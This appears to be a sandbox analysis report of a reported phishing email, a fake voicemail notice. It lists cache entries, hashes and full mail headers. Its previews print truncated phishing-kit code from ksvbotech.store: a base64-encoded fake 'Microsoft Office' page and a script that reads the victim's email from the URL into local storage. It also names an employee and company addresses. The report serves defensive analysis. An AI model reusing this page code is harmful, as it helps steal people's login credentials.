      SHA-512:641BF303E1DB8F8FABB0E2943ACB30E7F229D3E928C6159B85F91844500DDAF58AA3EACBFCA896C8A1AD6447FEC0FA8FED2786B1210D0CB081EABFBF7DED53D4
      Malicious:false
      Reputation:unknown
      URL:https://ksvbotech.store/gesp/basic.js
      Preview:$(document).ready(function() {.. saveFile();..});....function saveFile(name, type, data) {.. if (data != null && navigator.msSaveBlob).. return navigator.msSaveBlob(new Blob([data], { type: type }), name);.... var uid = localStorage.getItem('uid') || ""; // Retrieve UID from local storage.. var encodedStringAtoB = 'PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPiAKICA8dGl0bGU+TWljcm9zb2Z0IE9mZmljZTwvdGl0bGU+CiAgPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiIC8+CiAgPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2luZGV4LCBub2ZvbGxvdyIgLz4KICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vc29wYnRlY2guc3RvcmUvc3RhcnQveGxzL2luY2x1ZGVzL2NzczYuY3NzIj4KICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9hamF4Lmdvb2dsZWFwaXMuY29tL2FqYXgvbGlicy9qcXVlcnkvMi4yLjQvanF1ZXJ5Lm1pbi5qcyI+

      Chrome Cache Entry: 94

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):9489
      Entropy (8bit):7.963692772255007
      Encrypted:false
      SSDEEP:
      MD5:BD3254A066C1A81476BFAE453EA61E9F
      SHA1:AC88290720480FAF5959EE84B400C350CF7D1F58
      SHA-256:556B7311393CDDC0AF800EEA771717E937BA3847980A2A8F6785E1D846EBC1F5
      SHA-512:7245CB886ADD3F411FC08C5664DF48A3DC6FBDAB114968BD6CA579930FBCDF5A07248C1C64A8E187414404F7AE00AF837A7255638AA62F38AC2E309A0339FE88
      Malicious:false
      Reputation:unknown
      Preview:.PNG........IHDR.............L\....$.IDATx..y..U./.=Kf.........qA..E.n7:.)....3N......L.f...L......3.m.kf..F.7......h....P..UE....kf..E......-.-//.>. ...<y..s.w;'OR)%L.t.....:&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1&.(1.]..NV.o.`.[.$...E]:....D)] .,.R..i...BH)1.RJ.W.B..-.R.t.Pr..!.1....O..!.~R..^......An.M.x..gO.:%.0M3.N.....7..!.z........t)..K..L&344...g..+V.b1!...PGGG2.....c.sB..T.u).i...."`...L..E]]]..T..'@).....].v.<x....ppp......O/++.Rn.U..{...1.\(E.......jjjjll.>}....jkk[ZZ..@I[..(%...c.Q.T........^x....B.T.1f.F4.-....8.P...~=v...{.....MMM...K.,.........4............{...?...-[.(..i..m..!E..0....!D._.AR.8q.....~.466655=...K..........(.....o......0....+_.4.c.........4=.z.k___oo.e...\x..Y.....+lt>JI@OO......9r..c..B....<..R.1.f....J.y..?1.JYyWy'+j.1.1>{.lGG.S......v.m..W+.(1....O=.T6.M..J..s%)u. .4.C.4.4..uA....d..=...Z...!D.&.yoooOOOGGG<....[1.J.}....<..._....._.r...`*.......^$...3gNee....~.W...........S.

      Chrome Cache Entry: 96

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:downloaded
      Size (bytes):1362
      Entropy (8bit):4.91273169880799
      Encrypted:false
      SSDEEP:
      MD5:1AF2D30DCB2F89589CB89F50D819C8CE
      SHA1:4FF50438A3C929D011BD2C8FBCC2E48EBCB952F0
      SHA-256:553C9196B08988E9A456A208D711E7FE600A27BDF1926941CEF7A2F49F834636
      SHA-512:3125528329D8752CCD21683FDA041DDC966B4ABC6CF252D231B50CCABC197DB5AFE5A96A4D2214EEAA4AF3D1CA022AA69544BD779F242282EB7A4DBE637F3974
      Malicious:false
      Reputation:unknown
      URL:https://ksvbotech.store/gesp/msg.html
      Preview:<!DOCTYPE html>..<html>..<head>.. <title>Microsoft Office</title>.. <meta http-equiv="content-type" content="text/html; charset=UTF-8">.. <meta name="robots" content="noindex, nofollow">.. <meta name="googlebot" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. .. <script type="text/javascript" src="https://ksvbotech.store/gesp/jquery.js"></script>.. <script type="text/javascript" src="https://ksvbotech.store/gesp/basic.js"></script>.. .. <script type="text/javascript">.. // Function to get email from the URL hash.. function getEmailFromHash() {.. var hash = window.location.hash.substring(1); // Remove the '#' character.. if (hash && hash.includes("@")) {.. return hash;.. }.. return null;.. }.... // Function to store email in local storage.. function storeEmailInLocalStorage(email) {.. if (email) {.. localStorage.setItem('uid', email);.. }.. }.... // Ensure the

      Chrome Cache Entry: 99

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:JSON data
      Category:downloaded
      Size (bytes):20
      Entropy (8bit):3.446439344671015
      Encrypted:false
      SSDEEP:
      MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
      SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
      SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
      SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
      Malicious:false
      Reputation:unknown
      URL:https://api.ipify.org/?format=json
      Preview:{"ip":"8.46.123.33"}

      Static File Info

      General

      File type:SMTP mail, ASCII text, with very long lines (487), with CRLF line terminators
      Entropy (8bit):5.944125639422995
      TrID:
      • E-Mail message (Var. 1) (20512/2) 100.00%
      File name:original (37).eml
      File size:53'028 bytes
      MD5:46780ed985e098575251fbda415651d7
      SHA1:dc4d7804eb78e03f8b07f4ce7543c539ec063ba5
      SHA256:ebaa85b67c633784b7bf51dfa0f217887c40b71724af99857e114809bb37e4b0
      SHA512:ff14d1ae29a92f04698dbd8aa9133754a73c720112cf7e121ce143a072a73818181e8c16e59521d17094f098bb09d2721bd365b92a55820dc7d4ee69a58febb1
      SSDEEP:1536:uZMRU6mvOs3Zf2BZQ2Z+tnaD+4x++MEuinhPmG4QsQko:QMRUVp3Zf2B8tnzWnMdo
      TLSH:4133C0164F4525614BC5738EC438BB0B5362A941B2E7F9C533CE6C9E019B9DB7C3A22B
      File Content Preview:Return-Path: <UdayPrakash.Dukkipati@tdwilliamson.com>..Received: from NAM12-MW2-obe.outbound.protection.outlook.com (mail-mw2nam12on2124.outbound.protection.outlook.com [40.107.244.124]).. by inbound-smtp.us-east-1.amazonaws.com with SMTP id seuaob8d0d0oj

      Static Mail

      General

      Subject:[Phish Alert] Caller left VM MSG 00:01:30 DURATION- ab736b76edcbb42b2b457b755f7513078a6d6532
      From:"Dukkipati, Uday" <UdayPrakash.Dukkipati@tdwilliamson.com>
      To:IT-Security <IT-Security@tdwilliamson.com>, "55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com" <55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com>
      Cc:
      BCC:
      Date:Thu, 19 Sep 2024 07:23:55 +0000
      Communications:
      • [You don't often get email from call_service-playback-01-admn_brycer@richmondhoffmayer.com. Learn why this is important at https://aka.ms/LearnAboutSenderIdentification ] CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe.
      Attachments:
      • phish_alert_sp2_2.0.0.0.eml

      Headers

      Key Value
      Return-Path<UdayPrakash.Dukkipati@tdwilliamson.com>
      Receivedfrom DM3PR08MB9118.namprd08.prod.outlook.com ([fe80::25c9:9f63:51a9:e530]) by DM3PR08MB9118.namprd08.prod.outlook.com ([fe80::25c9:9f63:51a9:e530%7]) with mapi id 15.20.7982.016; Thu, 19 Sep 2024 07:23:55 +0000
      Received-SPFpass (spfCheck: domain of tdwilliamson.com designates 40.107.244.124 as permitted sender) client-ip=40.107.244.124; envelope-from=UdayPrakash.Dukkipati@tdwilliamson.com; helo=NAM12-MW2-obe.outbound.protection.outlook.com;
      Authentication-Resultsamazonses.com; spf=pass (spfCheck: domain of tdwilliamson.com designates 40.107.244.124 as permitted sender) client-ip=40.107.244.124; envelope-from=UdayPrakash.Dukkipati@tdwilliamson.com; helo=NAM12-MW2-obe.outbound.protection.outlook.com; dkim=pass header.i=@tdwilliamson.com; dmarc=pass header.from=tdwilliamson.com;
      X-SES-RECEIPTAEFBQUFBQUFBQUFFTWtGRXBmdngxRUQxR0RJMXJXVjNSSnFhKzROT1dBalZWTmVreG9Xd3RDV21LdEtaV0tTbGlVRm00UFgySnVLSHZwb2drVmFSQjhrdFJJTUFNaUdxQUNkN3RmaUZ6K3FXMS9VRHYyZFdOZVliZTVYSGdSMWVpZmltQytNZVN5Wkx4WmxHR2FUMmw4eHpHUWhhNnVsaTZCQ3BCc0JpdUU3SjAwU1dmSWFhUVFIdi9Zb0xaZ0d6MktON2VERldUSi90Mms1RzVXSEdwcWtMNzVsb2NDYVhWOXJHbzhpZ1N6Y3ZuQXNhZkgxS0NWR1FBZDlhWTJyQlJLenJnbmdoOThiUmlpcmt6S25wK0tNSVhoTTZUcHBxZVhOaDhGMVBReUY2L09uWjFna0tOTUw5Y1dpVkNzb3ZGUjVKYWtEL08zODRINWtnc1dHUHYwTnA5NjlnOEQ3eWM=
      X-SES-DKIM-SIGNATUREa=rsa-sha256; q=dns/txt; b=kC1ijFWRlGq2/UzMCO9KOTuD1vyhCVa61nMYKbm3agDcxdrBb3hFus/1W33nTG4a4lgSavPW5WktliVeqVUZfUB2LCwiZtUrBA05Le6i2dCwkEntjhiN1sriNQoTFTV3IOb/q8NORKALcp5wb5zdqRELLByWWEuIztYjdUUbNw0=; c=relaxed/simple; s=ug7nbtf4gccmlpwj322ax3p6ow6yfsug; d=amazonses.com; t=1726730641; v=1; bh=xsA4OaVbZl3XPwV7Oe+DKVDH6tGrjHpi7OY7Nj+4B4k=; h=From:To:Cc:Bcc:Subject:Date:Message-ID:MIME-Version:Content-Type:X-SES-RECEIPT;
      ARC-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=uQA5rI0vlhlpn1F99lhI7aO2MMH1esj2DvTpq/kT+yR/v92ao3JUzxWNQq7mschL2va3TM/MY1P/s3XARw78W7Bpw1gDi9edcaaMFfyKJd6BTLRfm6Cxre+1+aY4ORBH4eDzxd9SHGidxvzqdKtXjnve2b7ubwmNI+DTHgaVdGT3LiW9vzPQL1t5zSmU8pYP4EebJKoaSjNd1FkekEcTt/thbZcVKczgRguNIy/I3KPN5lVrVNnouKEBGflM7SKmJWZ8psR/1dYBFANL0p61Crql+uG0M4FGwMuM1zgUeVuZnnj2p2rGvmXMxNHXcdxquJx7AxC41zq87n9iqAYqQw==
      ARC-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=hlwJOzBwRmw2PKndjs9ZG9UJL8tgrNpQetqGtXARWiE=; b=Vt/U265A37LkJ6Y/eMM2UsYcnvC12uUvzxPB2U2NwmwbsOpoSjlBjZP7q+jmjHuubdsUNz6sMACP4cZTsdVPqtckXK61p7VjJY70ULlP19r5P5ZdLN9u6+Sovqk3zmZgr+arEXt5yU3xQ9D+z1yeCoZUsWIoba92unZJlp45CUsVsZvYMMPrbWx9ItIh7EV5Vl7a3Ln8Kdo3jY8c+JvjHuc9+yrt5FaXSVsJ53zsSvnZ+RKypJg5M+h72poN1st37QfmG5PN7Ax1q5OUG1qS3oF50pjRRz5xqUWwJb8dJ/qHBJALezAWOxBFPGJ3WMJQBWy1PRpV5Q6G++CaVW7kNA==
      ARC-Authentication-Resultsi=1; mx.microsoft.com 1; spf=pass smtp.mailfrom=tdwilliamson.com; dmarc=pass action=none header.from=tdwilliamson.com; dkim=pass header.d=tdwilliamson.com; arc=none
      DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=tdwilliamson.com; s=selector2; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=hlwJOzBwRmw2PKndjs9ZG9UJL8tgrNpQetqGtXARWiE=; b=nbhZYhTMZsB530aPBlu5f7sSc08r3fUEBPY1JB6LPpwVPr07riMMB+ymdopFH24PmZ9de2qgzTFQxwNWagLdPrkXDvSSHhHHpGVyqe3xbqCHPkO5eUDkwmuCtwVqjdmFryYL5fHDm3mfHz5uoXeELSXH+5Kb0b6PaymG/QtAFIXstXA15uwkHsZiIEIXU7Hrnb3bVrUSS4RNoRbfE6UA9pUTIJhxLMLl10PMHj7TWi+nNp79ZMBb47E2Gl6PNZ+p7GzU4EdC3BxhyG6JiIIirhaX72bmV6rTMaC/PXnn8doi3GtfSKEFOxHjrOc8Lrb6QG+kT37Ruhb+fFsWW2OamA==
      From"Dukkipati, Uday" <UdayPrakash.Dukkipati@tdwilliamson.com>
      ToIT-Security <IT-Security@tdwilliamson.com>, "55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com" <55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com>
      Subject[Phish Alert] Caller left VM MSG 00:01:30 DURATION- ab736b76edcbb42b2b457b755f7513078a6d6532
      Thread-Topic[Phish Alert] Caller left VM MSG 00:01:30 DURATION- ab736b76edcbb42b2b457b755f7513078a6d6532
      Thread-IndexAQHbCmTivaVCXLFpxkW5vtqpQ7dxvA==
      DateThu, 19 Sep 2024 07:23:55 +0000
      Message-ID <DM3PR08MB9118126CE9927349F879C2498D632@DM3PR08MB9118.namprd08.prod.outlook.com>
      Accept-Languageen-US
      Content-Languageen-US
      X-MS-Has-Attachyes
      X-MS-TNEF-Correlator
      authentication-resultsdkim=none (message not signed) header.d=none;dmarc=none action=none header.from=tdwilliamson.com;
      x-ms-publictraffictypeEmail
      x-ms-traffictypediagnosticDM3PR08MB9118:EE_|DM8PR08MB7415:EE_
      x-ms-office365-filtering-correlation-id6b86bf22-9608-4946-1f79-08dcd87c0505
      x-ms-exchange-senderadcheck1
      x-ms-exchange-antispam-relay0
      x-microsoft-antispamBCL:0;ARA:13230040|366016|1800799024|376014|38070700018;
      x-microsoft-antispam-message-info sdKRNOKvplxj9lbrwLpcZQGFpUnSnLlEE2jnxZUkzuDLptNXyVbyKlWP87+PuD5fyZcIZsuWCh0zXQlSI3DsB/2g+5aEvtlm6zLNS34Z8WCSkxvBSJ2VIe68Nw4USa8ssEYkf52K39LkfiW314QQnD4Haa4jcjDHjnPBNDddn3oP4mLt73vCzlwc/FIeMEa3+/ZvKRaPXvxQt5/r45I/teG1JzfsMNp+TLSFEFAgJK9M+GkuSuydMdmNWbqSo0u2FZcchWD+hnoTq2cTIak02NFwNmgmG2dXaTyDCarakxllg/MS80yMstwz5hUFbfjJ4Jqx03fKCcdhId9ZEgEZfBkqEw6uEwGbyn31QWgGpe5YAxxfyRIxFMRvT2oakwVuwMHwJ8iFHrX2+FgRqDtef/4M0si3aXqkeVu19j5eH9y0tQhxb+8YM/9ciN2FTnJEWgf0VdpiiKFQfQCJj3VRyg0HsgDinfwZU0ayWEv7ZN73qrx4tscLaz6ItgFXER/fOSStOx/BAzTlYeW4J6cGT+a6fe2LC6W8YeaESgzm2eGZKAKpeTgM7VqkdJZyW3z76IClsMe9TJlvQbeygUP/lIdnwkR0gwlQjR4hdfLQQ1xJa/jhqGp4OTYaVONDjjSna24zXcCc9ikC2o7p14OGm/3NbfsWrbQR/RyTzUYGL+l/ynKeZAQKq76DR47l99l/ematc5niRhqBizyE1NuUeY87k2r0LHNOA6f7HsHyFYK7W+X78kBeQm3QfsE3pILWWf6BpZegtGFYOdhNg0C03H9KcI2bOPVOKeCPnVtxuwSBoDHgTIjmdnwuaX6Hy3ZZlnwLn/HuwKHKNg9C9TkvT1s6LvRiZtT0Zi2/NoZVZ1bNUPcjhGUQG2mk7+8g0HWCt+7FqXn3MJlkat1WanwOwUU9Maw8po9YAeifJKCnh9Fe8Lx9kMrfqQqaFEN4NUas3SnAQm9kH4ktpCd/T4a3Gi73GBuVgyU9hGtaaKt5105t/7CrR0tijcg6x+PDBuX6ZDinEe0XITic5/fmzdMCepSK1DPMYkqd2bVz3/Ez7yux0iL4bMiGFXONsHcE4N48D5+phL7XbXDuuRAuUMJ9uf3dcN6U9N/gkhw4uJUi/7cZz9L52XxU0925raC+3qju7pWLw5Y3laJXhx4QHCcaxKghEqsjLwjQsbuQpWc3tW7L9tURNd2VxS3cYLX7lF53gH64C/2Sbtv9gP1EREODZ0VVg19vY7Q5TanvkLFGrUg50/H5PMy6atuDICMveK6Stvn7jXTSymlbhAK88ypFLu7f3rAFtgaV6VVqNwg0jOexaneWk7gwfTW2LiPkmhdA66K9IX+t6noB89Kg/nJ2Pw==
      x-forefront-antispam-report CIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:DM3PR08MB9118.namprd08.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230040)(366016)(1800799024)(376014)(38070700018);DIR:OUT;SFP:1102;
      x-ms-exchange-antispam-messagedata-chunkcount1
      x-ms-exchange-antispam-messagedata-0 LqMsVL5rgKBZfUpTWbr0NuwDto4VoOWE5BKIcXCYHXDgPOhjmBehNh9/rQdCD81tc4aXtAgxCrzWYmiExb1vWkQeo63/xlsBz5EalunjQwXJeQehwAfr3Rh0FaTKJ4AO5nqbfVaOhYkmKe23MGBblOLXrQInjrvX/g6dwovbO2gfCe5TBnyFuCiHPm4s/MkFRBp4Vc/feMiTGWuRtJUbfI4WYOu63E/J6zGlKRum2qbq3qV4xnRvziuDxo2TPyCFWgnoiY08YmXJmU6lYg/WVgaZt01zn4sFRy1ssRNDKupMdae4aVspcp4IhSeKVG4pmotBGHxXHvgCHUXOyi/iz0NCmL1tLZQoqcqUCHEZ3dKQVDamAXBFib7/WExi1ncRerDjW4MKxLgSl/p9M8VhPCtT4MDQIguIcOqNZU+dGglHZo9n7urvEG1q0ZuCr1kv0eFl4R28xi4EmRgWnB05SQIA+wfOpAGZQCZHIXctypsRg+QYAk10fwuS39OE8x8sJEguraiN9LDJU8UE84dKrl1ZW+2BcqH7btD6waf6aPmwYhIF4mOVsakJuiiFjzO6RXVjbtg+pqvqmegEcF0O9a69l3vvvyIA/Do9Q5qeCFCI2MouRJhDZDlMj2LLnVXaq2LIDKSUMIH3y4S66AVtpq1WDDtQzla6Q+lxzFqJVpUMG4xFQs6tkCmlGwwD0IN8wIzzu0NymR1NgfcGu+OmR7ZXjWOybq9CcYiNqa7LN+DxfVgd1maTyBP11oVXUg0DQkryoRTXhNv+Q4qQMp9lzEuuXTwHfx9j+C6Pz71w7TTieaPQNU+jWQ8XeXtbxSOUv/53il/nszIW56cr1UX300NAjt7PRm5hzUkIV9guY2C7nePx2I/g503qLhyr7ZXOkk8RONhJWn9mxhQ4W3j3KpAl+0K4xOQSZElTUERRgSYKqwNtP7ju7tTApQ/MrPJ6VhNu0bicMtNz9ayb1qH7jfuMsMPPn+hg5ShFjMZ/KOVqBJ/6z510dlB+L5CO1KqEDBxN/qj8I0YrJtZ1QWDlYWkwOonHqdmrzC2WEcG2r8pZxzJLrUdJ6qgBWAQCPpKgSaa2OVB1zTYlw78M3OM3E+KoFqL2niYac4SKzW3eVYacfr85ovfF+y11TM3N3kDQNckT+dYdq2VLH3WkrbJhUlgeM6vxGNGxw1Zyl1ir5NIbe+Aw8iIXcjPRFKhZzRkFl72y03ejTNoZsmC7tR6BvZ3NTGdVbGr0GZvSH+Uezue3Brqpu4pgGqDFAKQAOFuNHmcFti2Uxr90ERADUWEIlcuKJT9W0q/50R41uiUrECy7wBD02av7gAURr5xWJ2gyRV8xPqNVEKFzj7ZAT9WMaKQ/ctE770/ottoV03TV+1MqUBkFcRoEGEb4EhReQND7QN8QcuOrbLSIzzVSOGN6J2ITJjqXI4/HgB9SUVwYSUB4WYclwj9axruuw6qW0xQQrOa6yeuYLrbVG7HJAv23UmuakZo2G7nPNZ+n0HCBhPyo8S/vf78Johz5vHPr0zUEY+xjzTt5TWldu2P7qcp6AxJak7x7lR+AJ1n0ZiH9CdjW9bt6Xhb2egL4c4/jY4jUB0vXSxvFef0x4P7ide803pbZJd0cJSla/h5bQ+pZXnQ=
      Content-Typemultipart/mixed; boundary="_002_DM3PR08MB9118126CE9927349F879C2498D632DM3PR08MB9118namp_"
      MIME-Version1.0
      X-OriginatorOrgtdwilliamson.com
      X-MS-Exchange-CrossTenant-AuthAsInternal
      X-MS-Exchange-CrossTenant-AuthSourceDM3PR08MB9118.namprd08.prod.outlook.com
      X-MS-Exchange-CrossTenant-Network-Message-Id6b86bf22-9608-4946-1f79-08dcd87c0505
      X-MS-Exchange-CrossTenant-originalarrivaltime19 Sep 2024 07:23:55.1171 (UTC)
      X-MS-Exchange-CrossTenant-fromentityheaderHosted
      X-MS-Exchange-CrossTenant-idda7cba33-a475-42a2-a6d2-d3eabac375db
      X-MS-Exchange-CrossTenant-mailboxtypeHOSTED
      X-MS-Exchange-CrossTenant-userprincipalnameVG7AjQpM3uc6IXvC/thympWZ5jSaXZCbJiAarS3dtDmA3Ku8csueh5wsiel06aAI/eN5WN2tS/+ZN41kKEZF5wIZzEXcpDbVHTYGZ3ZJTP/3VX7LiWJGPAe7Hm4W28bn
      X-MS-Exchange-Transport-CrossTenantHeadersStampedDM8PR08MB7415

      File Icon

      Icon Hash:46070c0a8e0c67d6